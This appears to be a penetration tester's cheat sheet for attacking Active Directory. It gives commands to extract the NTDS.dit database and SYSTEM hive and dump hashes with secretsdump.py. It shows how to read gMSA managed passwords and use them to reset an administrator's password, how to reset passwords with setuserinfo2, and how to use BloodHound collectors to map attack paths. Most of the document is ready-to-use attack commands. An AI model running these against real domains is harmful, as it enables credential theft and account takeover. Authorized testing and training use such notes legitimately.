# REMOTE
## Download .dit file (assuming evil-winrm is used)
download <database_file>
## Get system HIVE
reg.exe save hklm\system <destination>
# LOCAL (after file downloads)
secretsdump.py -system <system_hive> -ntds <database_file> LOCAL
gMSA
(ReadGMSAPassword abuse)
Group Managed Service Accounts (gMSA) are where Windows servers manage the password for an account by generating a long random password for it.
Get Password (locally)
# Save the blob to a variable
$gmsa = Get-ADServiceAccount -Identity <user> -Properties 'msDS-ManagedPassword'
$mp = $gmsa.'msDS-ManagedPassword'
ConvertFrom-ADManagedPasswordBlob $mp
# Save the password to variables
(ConvertFrom-ADManagedPasswordBlob $mp).CurrentPassword
$password = (ConvertFrom-ADManagedPasswordBlob $mp).CurrentPassword
$SecPass = (ConvertFrom-ADManagedPasswordBlob $mp).SecureCurrentPassword
# Reset password of admin if the compromised user has GenericAll permissions
$cred = New-Object System.Management.Automation.PSCredential <user>, $SecPass
Invoke-Command -ComputerName 127.0.0.1 -ScriptBlock {Set-ADAccountPassword -Identity <admin_user> -reset -NewPassword (ConvertTo-SecureString -AsPlainText 'PASSWORD' -force)} -Credential $cred
Often we have the credentials belonging to limited administrative accounts such as IT, helpdesk or support.
Sometimes, these accounts have an ability to reset passwords.
Note that the wording of the account name might be different, but related to aforementioned names
setuserinfo2 <user> 23 <password>
BloodHound
BloodHound is used to visualise AD environments and discover attack paths.
Ingestors
SharpHound
Local data collector for BloodHound
bloodhound.py
Python based data collection tool for BloodHound
This will run against the domain, so can one run it from a remote machine.